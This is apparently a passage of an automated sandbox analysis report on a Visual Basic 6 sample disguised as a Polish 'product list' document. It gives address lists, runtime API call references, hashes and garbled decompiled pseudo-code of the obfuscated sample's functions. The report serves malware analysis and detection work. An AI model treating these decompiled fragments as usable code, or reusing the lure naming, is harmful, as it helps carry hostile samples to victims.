                  0x00408cc9
                  0x00408cdf
                  0x00408ce9
                  0x00408cf5
                  0x00408d12
                  0x00408cf7
                  0x00408cf7
                  0x00408cfc
                  0x00408d01
                  0x00408d06
                  0x00408d06
                  0x00408d24
                  0x00408d3f
                  0x00408d42
                  0x00408d44
                  0x00408d51
                  0x00408d73
                  0x00408d53
                  0x00408d53
                  0x00408d55
                  0x00408d5a
                  0x00408d60
                  0x00408d66
                  0x00408d6b
                  0x00408d6b
                  0x00408d80
                  0x00408d9b
                  0x00408da1
                  0x00408da3
                  0x00408db0
                  0x00408dd5
                  0x00408db2
                  0x00408db2
                  0x00408db7
                  0x00408dbc
                  0x00408dc2
                  0x00408dc8
                  0x00408dcd
                  0x00408dcd
                  0x00408de3
                  0x00408df0
                  0x00408dfc
                  0x00408e19
                  0x00408dfe
                  0x00408dfe
                  0x00408e03
                  0x00408e08
                  0x00408e0d
                  0x00408e0d
                  0x00408e2b
                  0x00408e46
                  0x00408e49
                  0x00408e4b
                  0x00408e58
                  0x00408e7a
                  0x00408e5a
                  0x00408e5a
                  0x00408e5c
                  0x00408e61
                  0x00408e67
                  0x00408e6d
                  0x00408e72
                  0x00408e72
                  0x00408e87
                  0x00408e8d
                  0x00408e97
                  0x00408ea4
                  0x00408eb1
                  0x00408eb2
                  0x00408eb3
                  0x00408eb4
                  0x00408ec8
                  0x00408ecb
                  0x00408ecd
                  0x00408eda
                  0x00408efc
                  0x00408edc
                  0x00408edc
                  0x00408ede
                  0x00408ee3
                  0x00408ee9
                  0x00408eef
                  0x00408ef4
                  0x00408ef4
                  0x00408f09
                  0x00408f09
                  0x00408f0e
                  0x00408f18
                  0x00408f22
                  0x00408f2c
                  0x00408f5d
                  0x00408f6a
                  0x00408f71
                  0x00408f7b
                  0x00408f8b
                  0x00408f91
                  0x00408fc4
                  0x00408fca
                  0x00408fd7
                  0x00408ff9
                  0x00408fd9
                  0x00408fd9
                  0x00408fde
                  0x00408fe3
                  0x00408fe6
                  0x00408fec
                  0x00408ff1
                  0x00408ff1
                  0x00409006
                  0x0040900c
                  0x00409030
                  0x00409036
                  0x00409043
                  0x00409065
                  0x00409045
                  0x00409045
                  0x0040904a
                  0x0040904f
                  0x00409052
                  0x00409058
                  0x0040905d
                  0x0040905d
                  0x00409072
                  0x00409080
                  0x004090a0
                  0x004090a6
                  0x004090b3
                  0x004090d5
                  0x004090b5
                  0x004090b5
                  0x004090ba
                  0x004090bf
                  0x004090c2
                  0x004090c8
                  0x004090cd
                  0x004090cd
                  0x004090e2
                  0x004090ee
                  0x004090fe
                  0x0040911e
                  0x00409124
                  0x00409131
                  0x00409153
                  0x00409133
                  0x00409133
                  0x00409138
                  0x0040913d
                  0x00409140
                  0x00409146
                  0x0040914b
                  0x0040914b
                  0x00409160
                  0x0040916c
                  0x00409178
                  0x00409195
                  0x0040917a
                  0x0040917a
                  0x0040917f
                  0x00409184
                  0x00409189
                  0x00409189
                  0x004091b9
                  0x004091c0
                  0x004091c5
                  0x004091e0
                  0x004091e6
                  0x004091e8
                  0x004091f5
                  0x0040921a
                  0x004091f7
                  0x004091f7
                  0x004091fc
                  0x00409201
                  0x00409207
                  0x0040920d
                  0x00409212
                  0x00409212
                  0x00409232
                  0x0040923a
                  0x00409244
                  0x00409254
                  0x0040925a
                  0x00409279
                  0x00409280
                  0x0040928d
                  0x004092a2
                  0x004092a8
                  0x004092b5
                  0x004092d7
                  0x004092b7
                  0x004092b7
                  0x004092bc
                  0x004092c1
                  0x004092c4
                  0x004092ca
                  0x004092cf
                  0x004092cf
                  0x004092e4
                  0x004092ed
                  0x004092f8
                  0x004092ff
                  0x00409300
                  0x00409302
                  0x00409310
                  0x0040931c
                  0x00409339
                  0x0040931e
                  0x0040931e
                  0x00409323
                  0x00409328
                  0x0040932d
                  0x0040932d
                  0x0040935d
                  0x00409364
                  0x00409369
                  0x00409384
                  0x0040938a
                  0x0040938c
                  0x00409399
                  0x004093be
                  0x0040939b
                  0x0040939b
                  0x004093a0
                  0x004093a5
                  0x004093ab
                  0x004093b1
                  0x004093b6
                  0x004093b6
                  0x004093d6
                  0x004093de
                  0x004093e8
                  0x004093f8
                  0x004093fe
                  0x00409405
                  0x0040940a
                  0x00409439
                  0x0040943f
                  0x0040944c
                  0x0040946e
                  0x0040944e
                  0x0040944e
                  0x00409453
                  0x00409458
                  0x0040945b
                  0x00409461
                  0x00409466
                  0x00409466
                  0x0040947b
                  0x0040948e
                  0x0040949c
                  0x004094a9
                  0x004094af
                  0x004094b1
                  0x004094be
                  0x004094e0
                  0x004094c0
                  0x004094c0
                  0x004094c5
                  0x004094ca
                  0x004094cd
                  0x004094d3
                  0x004094d8
                  0x004094d8
                  0x00000000
                  0x004094e7
                  0x004094ee
                  0x0040950b
                  0x004094f0
                  0x004094f0
                  0x004094f5
                  0x004094fa
                  0x004094ff
                  0x004094ff
                  0x0040952f
                  0x00409536
                  0x0040953b
                  0x00409556
                  0x0040955c
                  0x0040955e
                  0x0040956b
                  0x00409590
                  0x0040956d
                  0x0040956d
                  0x00409572
                  0x00409577
                  0x0040957d
                  0x00409583
                  0x00409588
                  0x00409588
                  0x0040959d
                  0x004095a3
                  0x004095b6
                  0x004095d6
                  0x004095dc
                  0x004095e9
                  0x0040960b
                  0x004095eb
                  0x004095eb
                  0x004095f0
                  0x004095f5
                  0x004095f8
                  0x004095fe
                  0x00409603
                  0x00409603
                  0x00409618
                  0x00409624
                  0x0040962f
                  0x0040963b
                  0x00409658
                  0x0040963d
                  0x0040963d
                  0x00409642
                  0x00409647
                  0x0040964c
                  0x0040964c
                  0x0040967c
                  0x00409683
                  0x00409688
                  0x004096a3
                  0x004096a9
                  0x004096ab
                  0x004096b8
                  0x004096dd
                  0x004096ba
                  0x004096ba
                  0x004096bf
                  0x004096c4
                  0x004096ca
                  0x004096d0
                  0x004096d5
                  0x004096d5
                  0x004096ea
                  0x004096f0
                  0x00409703
                  0x00409723
                  0x00409729
                  0x00409736
                  0x00409758
                  0x00409738
                  0x00409738
                  0x0040973d
                  0x00409742
                  0x00409745
                  0x0040974b
                  0x00409750
                  0x00409750
                  0x00409765
                  0x0040976e
                  0x00409779
                  0x0040977e
                  0x00409788
                  0x00409798
                  0x0040979f
                  0x004097a6
                  0x004097a7
                  0x004097b4
                  0x004097b9
                  0x004097c3
                  0x004097d3
                  0x004097d4
                  0x004097da
                  0x004097db
                  0x004097e5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004097ec
                  0x004097ec
                  0x004097f8
                  0x004097fb

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004011F6), ref: 00408462
                  • __vbaAryConstruct2.MSVBVM60(?,004031F4,00000003,?,?,?,?,004011F6), ref: 0040849C
                  • __vbaStrCat.MSVBVM60(00402FE0,00402FE0,?,004031F4,00000003,?,?,?,?,004011F6), ref: 004084AB
                  • #617.MSVBVM60(?,00000008,00000001), ref: 004084D0
                  • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,00000008,00000001), ref: 004084F7
                  • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,00008008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408513
                  • #536.MSVBVM60(00000002), ref: 00408545
                  • __vbaStrMove.MSVBVM60(00000002), ref: 00408552
                  • __vbaFreeVar.MSVBVM60(00000002), ref: 0040855D
                  • #703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000002), ref: 00408585
                  • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000002), ref: 0040858F
                  • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000002), ref: 0040859A
                  • __vbaFpI4.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000002), ref: 004085A5
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402AE0,00000064), ref: 004085D7
                  • #536.MSVBVM60(00000002), ref: 00408606
                  • __vbaStrMove.MSVBVM60(00000002), ref: 00408613
                  • __vbaFreeVar.MSVBVM60(00000002), ref: 0040861E
                  • __vbaSetSystemError.MSVBVM60(?,00000002), ref: 00408635
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 0040865A
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 004086BF
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,000000C0), ref: 00408721
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403014,000000C0), ref: 00408749
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 00408761
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 004087C6
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,000000F8), ref: 00408828
                  • __vbaStrMove.MSVBVM60(00000000,?,00403014,000000F8), ref: 0040885B
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403014,000000F8), ref: 00408866
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 0040887E
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,0000001C), ref: 004088E3
                  • __vbaChkstk.MSVBVM60(?), ref: 00408921
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403024,00000054), ref: 00408967
                  • __vbaChkstk.MSVBVM60(00000000,?,00403024,00000054), ref: 004089A7
                  • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 004089C0
                  • __vbaFreeObj.MSVBVM60(?,00000000), ref: 004089CB
                  • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004089D6
                  • __vbaSetSystemError.MSVBVM60(008966DA), ref: 004089EB
                  • __vbaNew2.MSVBVM60(00403004,004123C0,008966DA), ref: 00408A13
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 00408A78
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,00000110), ref: 00408ADA
                  • __vbaStrMove.MSVBVM60(00000000,?,00403014,00000110), ref: 00408B0D
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403014,00000110), ref: 00408B18
                  • #535.MSVBVM60(00000000,?,00403014,00000110), ref: 00408B1D
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 00408B38
                  • __vbaObjSetAddref.MSVBVM60(?,00401180), ref: 00408B6B
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000010), ref: 00408BA6
                  • __vbaFreeObj.MSVBVM60(00000000,?,00402FF4,00000010), ref: 00408BC0
                  • __vbaSetSystemError.MSVBVM60(004C5969,008966DA), ref: 00408BD5
                  • __vbaNew2.MSVBVM60(00403004,004123C0,004C5969,008966DA), ref: 00408BFD
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 00408C62
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,00000108), ref: 00408CC4
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403014,00000108), ref: 00408CE9
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 00408D01
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 00408D66
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,000000C8), ref: 00408DC8
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403014,000000C8), ref: 00408DF0
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 00408E08
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,0000001C), ref: 00408E6D
                  • __vbaChkstk.MSVBVM60(00000000,?,00402FF4,0000001C), ref: 00408EA4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403024,00000060), ref: 00408EEF
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403024,00000060), ref: 00408F09
                  • __vbaHresultCheckObj.MSVBVM60(?,00401180,00402B10,000006FC,?,?,?,004C5969,008966DA), ref: 00408FEC
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,000006F8), ref: 00409058
                  • __vbaStrCopy.MSVBVM60(00000000,00401180,00402B10,000006F8), ref: 00409080
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 004090C8
                  • __vbaFreeStr.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 004090EE
                  • __vbaStrCopy.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 004090FE
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 00409146
                  • __vbaFreeStr.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 0040916C
                  • __vbaNew2.MSVBVM60(0040246C,(RO), ref: 00409184
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004091C0
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004030DC,000001B8), ref: 0040920D
                  • __vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 00409232
                  • __vbaStrVarMove.MSVBVM60(?,?,5F6BF5A0,?), ref: 00409280
                  • __vbaStrMove.MSVBVM60(?,?,5F6BF5A0,?), ref: 0040928D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,000006FC), ref: 004092CA
                  • __vbaFreeStr.MSVBVM60(00000000,00401180,00402B10,000006FC), ref: 004092ED
                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00409302
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,004011F6), ref: 00409310
                  • __vbaNew2.MSVBVM60(0040246C,(RO,?,?,?,?,?,?,?,?,?,004011F6), ref: 00409328
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00409364
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004030EC,00000100), ref: 004093B1
                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004093D6
                  • __vbaI4Var.MSVBVM60(?), ref: 00409405
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,000006FC), ref: 00409461
                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040948E
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,0040246C,(RO), ref: 0040949C
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402AE0,000002B4), ref: 004094D3
                  • __vbaNew2.MSVBVM60(0040246C,(RO,00008003,?,?,00000002,?), ref: 004094FA
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00409536
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004030DC,00000150), ref: 00409583
                  • __vbaStrMove.MSVBVM60(00000000,00000000,004030DC,00000150), ref: 004095B6
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 004095FE
                  • __vbaFreeStr.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 00409624
                  • __vbaFreeObj.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 0040962F
                  • __vbaNew2.MSVBVM60(0040246C,(RO,00000000,00401180,00402B10,00000700), ref: 00409647
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00409683
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004030DC,00000150), ref: 004096D0
                  • __vbaStrMove.MSVBVM60(00000000,00000000,004030DC,00000150), ref: 00409703
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 0040974B
                  • __vbaFreeStr.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 0040976E
                  • __vbaFreeObj.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 00409779
                  • __vbaVarAdd.MSVBVM60(?,00000002,?), ref: 004097A7
                  • __vbaVarMove.MSVBVM60(?,00000002,?), ref: 004097B4
                  • __vbaVarTstLt.MSVBVM60(00008003,?,?,00000002,?), ref: 004097DB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$CheckHresult$Free$New2$Move$Chkstk$ErrorLateListSystem$#536CallCopy$#535#617#703AddrefConstruct2
                  • String ID: (RO$Enervous$Holmberry5$JUVENILT$LYDIA$Receptionsassistenter4$SLAVESJLENE$X$disuniter
                  • API String ID: 2543599168-2988764042
                  • Opcode ID: 84ef98b712c1bb61970680905bcf3bc2b3ce1b077cc75f9bdc71affb8e2a378c
                  • Instruction ID: 6c77439a6440881836e68b9f9d37a3359eac8e5b2e9e6199c05848038b12c06f
                  • Opcode Fuzzy Hash: 84ef98b712c1bb61970680905bcf3bc2b3ce1b077cc75f9bdc71affb8e2a378c
                  • Instruction Fuzzy Hash: 4BB216709016289FEB22DF50CD45BDABBB8BF08705F0050EAE509B62A1DBB85F94DF14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 75%
                  			E00410546(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
                  				void* _v3;
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void* _v28;
                  				intOrPtr _v32;
                  				void* _v36;
                  				char _v52;
                  				char* _v60;
                  				void* _v68;
                  				void* _t22;
                  				char* _t24;
                  				void* _t38;
                  				void* _t41;
                  				intOrPtr _t42;
                  
                  				_t42 = _t41 - 0xc;
                  				 *[fs:0x0] = _t42;
                  				L004011F0();
                  				_v16 = _t42;
                  				_v12 = 0x401198;
                  				_v8 = 0;
                  				_t22 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4011f6, _t38);
                  				L0040136A();
                  				_v60 = L"TINCHILL";
                  				_t23 = _t22 + 1;
                  				asm("ror byte [eax], 0x0");
                  				 *_t23 =  *(_t22 + 1) + _t22 + 1;
                  				L004012CE();
                  				_push(0);
                  				_t24 =  &_v52;
                  				_push(_t24); // executed
                  				L004012D4(); // executed
                  				L004013B2();
                  				L004013A6();
                  				_v32 =  *0x401190;
                  				asm("wait");
                  				_push(0x4105f2);
                  				L00401364();
                  				L00401364();
                  				return _t24;
                  			}


















                  0x00410549
                  0x00410558
                  0x00410562
                  0x0041056a
                  0x0041056d
                  0x00410574
                  0x00410583
                  0x0041058c
                  0x00410591
                  0x00410596
                  0x0041059a
                  0x0041059d
                  0x004105a5
                  0x004105aa
                  0x004105ac
                  0x004105af
                  0x004105b0
                  0x004105ba
                  0x004105c2
                  0x004105cd
                  0x004105d0
                  0x004105d1
                  0x004105e4
                  0x004105ec
                  0x004105f1

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004011F6), ref: 00410562
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0041058C
                  • __vbaVarDup.MSVBVM60 ref: 004105A5
                  • #645.MSVBVM60(?,00000000), ref: 004105B0
                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004105BA
                  • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004105C2
                  • __vbaFreeStr.MSVBVM60(004105F2,?,00000000), ref: 004105E4
                  • __vbaFreeStr.MSVBVM60(004105F2,?,00000000), ref: 004105EC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Free$#645ChkstkCopyMove
                  • String ID: TINCHILL
                  • API String ID: 2239900635-1301385301
                  • Opcode ID: 30e086ac958ae0ac4c1e3400a4321b77ebbd695e6547cc46355ccc177ddcde3b
                  • Instruction ID: 73f56eb3243ecec4c2652903b943d6a510d45a39f948da130470c44d69a4370f
                  • Opcode Fuzzy Hash: 30e086ac958ae0ac4c1e3400a4321b77ebbd695e6547cc46355ccc177ddcde3b
                  • Instruction Fuzzy Hash: 17111870900209ABDB04EF91C886BDEBB78FF04704F40842AF501BB1A1DB786945CB88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 21%
                  			E00401B8D(intOrPtr* __eax, void* __ebx, void* __ecx) {
                  				void* _t10;
                  				void* _t12;
                  				void* _t24;
                  				void* _t25;
                  
                  				asm("in eax, dx");
                  				asm("in eax, dx");
                  				asm("in eax, dx");
                  				asm("in eax, dx");
                  				asm("in eax, dx");
                  				 *__eax =  *__eax + __eax;
                  				 *__eax =  *__eax + __eax;
                  				 *__eax =  *__eax + __eax;
                  				_t10 = __eax + __ecx + __ecx;
                  				0xe73b0289();
                  				asm("out 0xfa, al");
                  				0xe826038f();
                  				_t11 = _t10 + 1;
                  				_t25 = _t24 + 1;
                  				asm("ror byte [eax], 0x0");
                  				 *_t11 =  *(_t10 + 1) + _t10 + 1;
                  				L004012CE();
                  				_push(0);
                  				_t12 = _t25 - 0x30;
                  				_push(_t12); // executed
                  				L004012D4(); // executed
                  				L004013B2();
                  				L004013A6();
                  				 *((intOrPtr*)(_t25 - 0x1c)) =  *0x401190;
                  				asm("wait");
                  				_push(0x4105f2);
                  				L00401364();
                  				L00401364();
                  				return _t12;
                  			}







                  0x00401b8f
                  0x00401b90
                  0x00401b91
                  0x00401b92
                  0x00401b93
                  0x00401b94
                  0x00401b96
                  0x00401b98
                  0x00401b9a
                  0x00401b9c
                  0x00401ba1
                  0x00401ba3
                  0x00410596
                  0x00410599
                  0x0041059a
                  0x0041059d
                  0x004105a5
                  0x004105aa
                  0x004105ac
                  0x004105af
                  0x004105b0
                  0x004105ba
                  0x004105c2
                  0x004105cd
                  0x004105d0
                  0x004105d1
                  0x004105e4
                  0x004105ec
                  0x004105f1

                  APIs
                  • __vbaVarDup.MSVBVM60 ref: 004105A5
                  • #645.MSVBVM60(?,00000000), ref: 004105B0
                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004105BA
                  • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004105C2
                  • __vbaFreeStr.MSVBVM60(004105F2,?,00000000), ref: 004105E4
                  • __vbaFreeStr.MSVBVM60(004105F2,?,00000000), ref: 004105EC
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Free$#645Move
                  • String ID:
                  • API String ID: 3481341938-0
                  • Opcode ID: 2573991e60ae7dc378292da41cd709ca0806f0de5aa67fefd2c848887fcc2e6c
                  • Instruction ID: a96e80991ef884d3133b544aac1d5ec382cac5ea011f1be37a79e5a1b3ef65dc
                  • Opcode Fuzzy Hash: 2573991e60ae7dc378292da41cd709ca0806f0de5aa67fefd2c848887fcc2e6c
                  • Instruction Fuzzy Hash: 65F08130D192899EDB01E7A1DC51AED7B70AF11320F4402ABE062B74F2DE7C188ACB19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 184 4013f0-401419 #100 185 40141a-40144f 184->185 187 401451-401455 185->187 188 4014b2 185->188 187->185 189 401457-4014a9 187->189 190 4014b3 188->190 191 401524 188->191 193 401510-40151a 189->193 194 4014ab-4014b1 189->194 192 401525-401527 190->192 195 4014b4 190->195 191->192 197 401528-401531 192->197 196 40151b-401522 193->196 194->188 194->197 195->196 198 4014b5-4014bc 195->198 196->191 199 401532-40153a 197->199 198->199 202 4014be-4014c9 198->202 202->193
                  C-Code - Quality: 16%
                  			_entry_() {
                  				signed char _t44;
                  				intOrPtr* _t45;
                  				signed int _t46;
                  				signed char _t47;
                  				intOrPtr* _t48;
                  				intOrPtr* _t49;
                  				signed int _t50;
                  				signed int _t51;
                  				signed char _t52;
                  				signed int _t53;
                  				signed int _t57;
                  				void* _t61;
                  				signed int _t63;
                  				void* _t65;
                  				intOrPtr* _t66;
                  				void* _t68;
                  				void* _t71;
                  				signed int _t73;
                  				intOrPtr _t80;
                  
                  				_push("VB5!6&*"); // executed
                  				L004013E8(); // executed
                  				 *_t44 =  *_t44 + _t44;
                  				 *_t44 =  *_t44 + _t44;
                  				 *_t44 =  *_t44 + _t44;
                  				 *_t44 =  *_t44 ^ _t44;
                  				 *_t44 =  *_t44 + _t44;
                  				_t45 = _t44 + 1;
                  				 *_t45 =  *_t45 + _t45;
                  				 *_t45 =  *_t45 + _t45;
                  				 *_t45 =  *_t45 + _t45;
                  				 *((intOrPtr*)(_t63 + _t57 * 2 - 0x47)) =  *((intOrPtr*)(_t63 + _t57 * 2 - 0x47)) + _t57;
                  				asm("aas");
                  				 *(_t53 + 0xb) = _t63;
                  				_t66 = _t65 + 1;
                  				_t46 = 0x8ab5048e;
                  				asm("les ecx, [edx+0x9]");
                  				while(1) {
                  					_t63 = _t63 - 1;
                  					 *_t46 =  *_t46 | _t46;
                  					 *_t46 =  *_t46 + _t46;
                  					 *_t46 =  *_t46 + _t46;
                  					 *_t57 =  *_t57 + _t46;
                  					 *_t46 =  *_t46 + _t46;
                  					 *_t46 =  *_t46 + _t46;
                  					_t47 = _t46 + _t57;
                  					asm("invalid");
                  					_t61 = _t57 +  *((intOrPtr*)(_t71 + 0x4d + _t63 * 2)) - 0xffffffffffffffff;
                  					_t71 = _t71 + 1;
                  					_t68 = _t68 - 1 + 1 - 1;
                  					_push(_t73);
                  					 *_t47 =  *_t47 + _t61;
                  					_t57 = _t61 + 1;
                  					 *_t47 =  *_t47 + _t47;
                  					 *_t47 =  *_t47 + _t47;
                  					_t53 = _t53 + 1 + _t53 + 1;
                  					asm("int3");
                  					 *_t47 =  *_t47 ^ _t47;
                  					_push(es);
                  					asm("into");
                  					asm("sbb bh, [esi]");
                  					_t73 = _t73 |  *(_t47 + 0x56b54785);
                  					if(_t73 != 0) {
                  						break;
                  					}
                  					_t46 = _t47 |  *(_t66 + 0x33);
                  					_push(_t71);
                  					if(_t46 < 0) {
                  						continue;
                  					}
                  					 *((intOrPtr*)(_t68 - 0x6e)) =  *((intOrPtr*)(_t68 - 0x6e)) - _t63;
                  					_t15 = _t66 + _t46 * 2;
                  					 *_t15 = _t63;
                  					_t18 = _t71 - 0x3b91c6c1;
                  					_t63 =  *_t18;
                  					 *_t18 =  *_t15;
                  					_t50 = _t71;
                  					_t51 = _t50;
                  					asm("stosb");
                  					 *((intOrPtr*)(_t51 - 0x2d)) =  *((intOrPtr*)(_t51 - 0x2d)) + _t51;
                  					_t52 = _t53 ^  *(_t57 - 0x48ee309a);
                  					_t53 = _t51;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					_t47 = _t52 & 0x00000009;
                  					 *_t47 =  *_t47 + _t47;
                  					 *_t66 =  *_t66 + _t47;
                  					_t25 = _t63 + 0x65;
                  					 *_t25 =  *((intOrPtr*)(_t63 + 0x65)) + _t47;
                  					asm("arpl [ebp+0x72], si");
                  					if( *_t25 >= 0) {
                  						L13:
                  						 *_t47 =  *_t47 + _t47;
                  						 *_t47 =  *_t47 + _t47;
                  						 *_t47 =  *_t47 + _t47;
                  						 *_t47 =  *_t47 + _t47;
                  						 *_t47 =  *_t47 + _t47;
                  						L14:
                  						 *_t47 =  *_t47 + _t47;
                  						L15:
                  						 *_t47 =  *_t47;
                  						 *_t47 =  *_t47;
                  						 *((intOrPtr*)(_t47 + 0x800080)) =  *((intOrPtr*)(_t47 + 0x800080)) + _t47;
                  						L16:
                  						 *((intOrPtr*)(_t47 - 0x80000000)) =  *((intOrPtr*)(_t47 - 0x80000000)) + _t47;
                  						L17:
                  						 *_t47 =  *_t47;
                  						L18:
                  						 *((intOrPtr*)(_t47 - 0x7fff8000)) =  *((intOrPtr*)(_t47 - 0x7fff8000)) + _t47;
                  						 *_t47 =  *_t47;
                  						asm("rol al, 0xc0");
                  						L19:
                  						asm("rol al, 0x0");
                  						asm("rcr ah, 0xc0");
                  						_t48 = _t47 + _t63;
                  						asm("retf 0xa6");
                  						asm("int3");
                  						asm("invalid");
